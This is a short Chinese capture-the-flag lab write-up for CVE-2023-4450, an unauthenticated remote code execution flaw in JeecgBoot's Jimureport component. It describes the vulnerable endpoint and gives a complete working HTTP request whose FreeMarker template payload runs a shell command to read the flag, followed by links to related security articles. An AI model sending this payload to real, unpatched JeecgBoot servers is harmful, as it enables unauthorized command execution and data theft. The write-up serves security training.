【春秋云境】CVE-2023-4450 jeect-boot queryFieldBySql接口RCE漏洞

靶场介绍

JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一。当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在,由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。

开启靶场

漏洞利用

在搜索POC时,会发现直接访问URL是404

随机点击一个文档编辑,发现路径是从jmreport开始的

poc 复制代码
POST /jmreport/queryFieldBySql HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: */*
Accept-Encoding: gzip, deflate, br
Host: eci-2zefpkb9jv5tzsaox5zq.cloudeci1.ichunqiu.com:8080
Content-Type: application/json
Content-Length: 103

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\" cat /flag \") }' "}

获取flag

相关推荐
小小工匠2 小时前
Web安全 - 路径穿越(Path Traversal)
安全·web安全·路径穿越
不灭锦鲤4 小时前
ssrf学习(ctfhub靶场)
网络·学习·安全
网络研究院7 小时前
如何安全地大规模部署 GenAI 应用程序
网络·人工智能·安全·ai·部署·观点
DonciSacer10 小时前
TryHackMe 第6天 | Web Fundamentals (一)
安全
云卓科技14 小时前
无人机之数据提取篇
科技·安全·机器人·无人机·制造
山兔115 小时前
工控安全防护机制与技术
安全
HEX9CF16 小时前
【CTF Web】Pikachu xss之href输出 Writeup(GET请求+反射型XSS+javascript:伪协议绕过)
开发语言·前端·javascript·安全·网络安全·ecmascript·xss
小小工匠17 小时前
加密与安全_HOTP一次性密码生成算法
算法·安全·htop·一次性密码
Tandy12356_17 小时前
js逆向——webpack实战案例(一)
前端·javascript·安全·webpack
什么鬼昵称19 小时前
Pikachu-xxe-xxe漏洞
网络·安全·xxe